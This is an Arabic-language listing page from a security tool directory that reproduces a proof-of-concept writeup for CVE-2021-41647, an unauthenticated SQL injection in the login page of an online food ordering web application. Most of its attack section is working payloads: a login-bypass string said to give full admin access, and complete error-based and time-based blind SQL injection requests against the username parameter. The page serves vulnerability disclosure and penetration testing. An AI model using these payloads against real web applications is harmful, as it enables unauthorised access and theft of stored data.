Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41647 — استغلال لإثبات المفهوم لحقن SQL غير موثقة في تطبيق Online-Food-Ordering-Web-App، يوضح تجاوز تسجيل الدخول وتقنيات الحقن الأعمى القائمة على الخطأ والوقت. | Kitploit
أدوات/GitHubGitHub/mobiusbinary/cve-2021-41647
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

استغلال لإثبات المفهوم لحقن SQL غير موثقة في تطبيق Online-Food-Ordering-Web-App، يوضح تجاوز تسجيل الدخول وتقنيات الحقن الأعمى القائمة على الخطأ والوقت.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-41647

CVE-2021-41647 حقن SQL في تطبيق Online-Food-Ordering-Web-App

تطبيق Online-Food-Ordering-Web-App عرضة لهجمات حقن SQL العمياء الزمنية والمبنية على الأخطاء غير المصادق عليها. لا يقوم معامل username في الصفحة /login.php بتعقيم إدخال المستخدم، مما يمكن المهاجم من تجاوز تسجيل الدخول باستخدام تقنية تجاوز بسيطة.

رابط التطبيق

Online-Food-Ordering-Web-App

المكونات والمعامل المتأثرة

الرابط: /login.php
المعامل: username

إثباتات المفهوم (POC)

حمولة تجاوز تسجيل الدخول

لتجاوز تسجيل دخول المستخدم والحصول على وصول إداري كامل، استخدم الحمولة التالية في حقل إدخال اسم المستخدم: user' or 1=1-- -

حمولات SQLMap

المعامل: username (طلب POST) النوع: قائم على الأخطاء العنوان: MySQL >= 5.0 AND error-based - بند WHERE, HAVING, ORDER BY أو GROUP BY (FLOOR) الحمولة: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

النوع: أعمى زمني العنوان: MySQL >= 5.0.12 AND time-based blind (استعلام SLEEP) الحمولة: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

إذا كانت صورة إثبات المفهوم غير واضحة، يرجى النقر على GIF لتحميلها بدقة أفضل.

POC

تم الاكتشاف بواسطة

Jason Colyvas
MOBIUSBINARY
20 سبتمبر 2021

تنزيل الأداة